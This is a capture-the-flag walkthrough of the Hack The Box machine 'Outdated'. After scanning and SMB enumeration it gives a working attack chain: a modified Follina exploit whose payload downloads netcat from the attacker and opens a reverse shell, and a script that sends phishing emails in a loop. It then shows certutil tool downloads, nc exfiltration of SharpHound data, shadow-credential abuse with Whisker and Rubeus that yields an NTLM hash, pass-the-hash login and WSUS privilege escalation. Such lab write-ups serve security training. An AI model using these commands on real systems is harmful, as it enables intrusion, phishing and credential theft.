Start with nmap scan
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-30 15:04 MST
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 91.67% done; ETC: 15:05 (0:00:03 remaining)
Nmap scan report for outdated.htb (10.10.11.175)
Host is up (0.063s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mail.outdated.htb, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-01 06:04:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after: 2024-06-18T06:00:24
|_ssl-date: 2022-12-01T06:05:59+00:00; +8h00m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-12-01T06:05:58+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after: 2024-06-18T06:00:24
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-12-01T06:05:59+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after: 2024-06-18T06:00:24
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after: 2024-06-18T06:00:24
|_ssl-date: 2022-12-01T06:05:58+00:00; +8h00m00s from scanner time.
Service Info: Hosts: mail.outdated.htb, DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 8h00m00s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-12-01T06:05:22
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.55 seconds
Checked DNS next. With not much luck or anything interesting.
┌──[Target:Outdated🌐IP:10.10.11.175🚀⚔️Attacker:SourMilk📡IP:10.10.14.123🏆Prize:30 points]
└──╼[👾]~/HTB/outdated $ dig ns outdated.htb @10.10.11.175
; <<>> DiG 9.18.9 <<>> ns outdated.htb @10.10.11.175
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 42920
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 5
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;outdated.htb. IN NS
;; ANSWER SECTION:
outdated.htb. 3600 IN NS dc.outdated.htb.
;; ADDITIONAL SECTION:
dc.outdated.htb. 3600 IN A 172.16.20.1
dc.outdated.htb. 3600 IN A 10.10.11.175
dc.outdated.htb. 3600 IN AAAA dead:beef::50
dc.outdated.htb. 3600 IN AAAA dead:beef::e907:3922:993:9c2d
;; Query time: 55 msec
;; SERVER: 10.10.11.175#53(10.10.11.175) (UDP)
;; WHEN: Wed Nov 30 15:08:20 MST 2022
;; MSG SIZE rcvd: 146
──[Target:Outdated🌐IP:10.10.11.175🚀⚔️Attacker:SourMilk📡IP:10.10.14.123🏆Prize:30 points]
└──╼[👾]~/HTB/outdated $ dig any outdated.htb @dc.outdated.htb
; <<>> DiG 9.18.9 <<>> any outdated.htb @dc.outdated.htb
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 14727
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 5
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;outdated.htb. IN ANY
;; ANSWER SECTION:
outdated.htb. 600 IN A 10.10.11.175
outdated.htb. 600 IN A 172.16.20.1
outdated.htb. 3600 IN NS dc.outdated.htb.
outdated.htb. 3600 IN SOA dc.outdated.htb. hostmaster.outdated.htb. 274 900 600 86400 3600
outdated.htb. 600 IN AAAA dead:beef::50
outdated.htb. 600 IN AAAA dead:beef::e907:3922:993:9c2d
;; ADDITIONAL SECTION:
dc.outdated.htb. 1200 IN A 172.16.20.1
dc.outdated.htb. 1200 IN A 10.10.11.175
dc.outdated.htb. 1200 IN AAAA dead:beef::e907:3922:993:9c2d
dc.outdated.htb. 1200 IN AAAA dead:beef::50
;; Query time: 61 msec
;; SERVER: 10.10.11.175#53(dc.outdated.htb) (TCP)
;; WHEN: Wed Nov 30 15:09:21 MST 2022
;; MSG SIZE rcvd: 281
SMB up next
┌──[Target:Outdated🌐IP:10.10.11.175🚀⚔️Attacker:SourMilk📡IP:10.10.14.123🏆Prize:30 points]
└──╼[👾]~/HTB/outdated $ smbclient -N -L //10.10.11.175
Can't load /etc/samba/smb.conf - run testparm to debug it
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system.
WSUSTemp Disk A network share used by Local Publishing from a Remote WSUS Console Instance.
SMB1 disabled -- no workgroup available
Hop on /Shares and grab NOC_Reminder
┌──[Target:Outdated🌐IP:10.10.11.175🚀⚔️Attacker:SourMilk📡IP:10.10.14.123🏆Prize:30 points]
└──╼[👾]~/HTB/outdated $ smbclient //10.10.11.175/Shares
Can't load /etc/samba/smb.conf - run testparm to debug it
Password for [WORKGROUP\sourmilk]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jun 20 09:01:33 2022
.. D 0 Mon Jun 20 09:01:33 2022
NOC_Reminder.pdf AR 106977 Mon Jun 20 09:00:32 2022
9116415 blocks of size 4096. 2107961 blocks available
smb: \> get NOC_Reminder.pdf
getting file \NOC_Reminder.pdf of size 106977 as NOC_Reminder.pdf (263.1 KiloBytes/sec) (average 263.1 KiloBytes/sec)
smb: \> exit
NOC_Reminder shows CVE-2022-30190 also a nice juicy email. That well... somtimes likes to click links.
Grab follina. Change line 111 in follina.py
command = args.command
if args.reverse:
command = f"""Invoke-WebRequest http://yourIP/nc64.exe -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe YourIP {args.reverse}"""
Start follina with your ip on port 80 with a reverse shell on 9001
sudo python3 follina.py --interface 10.10.16.6 --port 80 -r 9001
Copy nc64.exe to created /tmp/asdasd/www/
#yttnp8ga is a tmp folder created by follina, yours will be different
sudo cp nc64.exe /tmp/yttnp8ga/www/nc64.exe
Send Email or use python script below
swaks --to itsupport@outdated.htb --from admin@outdate.htb --server mail.outdated.htb --header "Subject: foo" --body “http://10.10.16.6/index.html”
I used this python script to keep emailing the server with random subject and from adress. Keep script running until a shell pops.
import time
import subprocess
import random
import string
# Prompt the user for the required arguments
body = input("Enter the body for the email http://<ip>/index.html: ")
# Generate random strings for arg3, arg4, and arg5
arg3 = ''.join(random.choices(string.ascii_letters + string.digits, k=10))
arg4 = ''.join(random.choices(string.ascii_letters + string.digits, k=10))
arg5 = ''.join(random.choices(string.ascii_letters + string.digits, k=10))
while True:
try:
# Construct the swaks command using the user-specified and generated arguments
command = f'swaks --to itsupport@outdated.htb --from {arg3}@{arg4} --server mail.outdated.htb --header "Subject: {arg5}" --body "{body}"'
# Run the swaks command
subprocess.run(command, shell=True)
# Pause for 10 seconds before sending the next email
time.sleep(10)
except KeyboardInterrupt:
# If the user presses CTRL + C, exit the program
print("Exiting program")
break
Shell!
[👾]~/HTB/outdated/msdt-follina $ sudo python3 follina.py --interface 10.10.16.4 --port 80 -r 9001
[sudo] password for sourmilk:
[+] copied staging doc /tmp/4y4o9k1n
[+] created maldoc ./follina.doc
[+] serving html payload on :80
[+] starting 'nc -lvnp 9001'
Listening on 0.0.0.0 9001
Connection received on 10.129.35.230 49880
Microsoft Windows [Version 10.0.19043.928]
(c) Microsoft Corporation. All rights reserved.
C:\Users\btables\AppData\Local\Temp\SDIAG_96ab4662-d445-4061-8e53-739df54f843c>
No flag on desktop. Net Users
C:\Users\btables\Desktop>net users /domain
net users /domain
The request will be processed at a domain controller for domain outdated.htb.
User accounts for \\DC.outdated.htb
-------------------------------------------------------------------------------
Administrator btables Guest
krbtgt sflowers
The command completed successfully.
Grab WINPEAS and run
certutil.exe -urlcache -f http://10.10.16.6:8000/winPEASany.exe winPEASany.exe
WSUS shows vulnerable
Checking WSUS
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus
WSUS is using http: http://wsus.outdated.htb:8530
You can test https://github.com/pimps/wsuxploit to escalate privileges
And UseWUServer is equals to 1, so it is vulnerable!
Sharphound Stuff
#Download SharpHound
certutil.exe -urlcache -f http://10.10.16.6:8000/SharpHound.exe sh.exe
#Run SharpHound and zip results
sh.exe -c ALL --zipfilename sourmilk.zip
#Send the file back
nc.exe 10.10.16.6 4443 < 20221204221028_sourmilk.zip
Bloodhound shows that user btables belongs to the group staff and it has the ability to AddCredentialLink to the user sflowers .
> certutil.exe -urlcache -f http://10.10.16.6:8000/Whisker.exe Whisker.exe
> certutil.exe -urlcache -f http://10.10.16.6:8000/Rubeus.exe Rubeus.exe
> Whisker.exe add /target:sflowers
...<Snip>...
Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:"......." /domain:outdated.htb /dc:dc.outdated.htb /getcredentials /show
> Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:"..........." /domain:outdated.htb /dc:dc.outdated.htb /getcredentials /show
...<snip>...
NTLM : 1FCDB1F6......2BDA14DB5
Log in with evilwinrm
evil-winrm -i outdated.htb -u sflowers -H 1FCDB1F601......B2BDA14DB5
Upload Sharphound again
*Evil-WinRM* PS C:\Users\sflowers\Documents> upload /home/sourmilk/HTB/outdated/SharpHound.exe
Sharphound shows WSUS running though http server. Read all the info below and priv esc! Introducing SharpWSUS WSUS PayLoad All the Things SharpWSUS Github More WSUS Information
Locate the WSUS server:
SharpWSUS.exe locate
Inspect the WSUS server, enumerating clients, servers and existing groups:
SharpWSUS.exe inspect
Create an update (NOTE: The payload has to be a windows signed binary):
SharpWSUS.exe create /payload:[File location] /args:[Args for payload] </title:[Update title] /date:[YYYY-MM-DD] /kb:[KB on update] /rating:[Rating of update] /msrc:[MSRC] /description:[description] /url:[url]>
Approve an update:
SharpWSUS.exe approve /updateid:[UpdateGUID] /computername:[Computer to target] </groupname:[Group for computer to be added too] /approver:[Name of approver]>
Check status of an update:
SharpWSUS.exe check /updateid:[UpdateGUID] /computername:[Target FQDN]
Delete update and clean up groups added:
SharpWSUS.exe delete /updateid:[UpdateGUID] /computername:[Target FQDN] </groupname:[GroupName] /keepgroup>
Sorry for the bad notes. This box really took it out on me.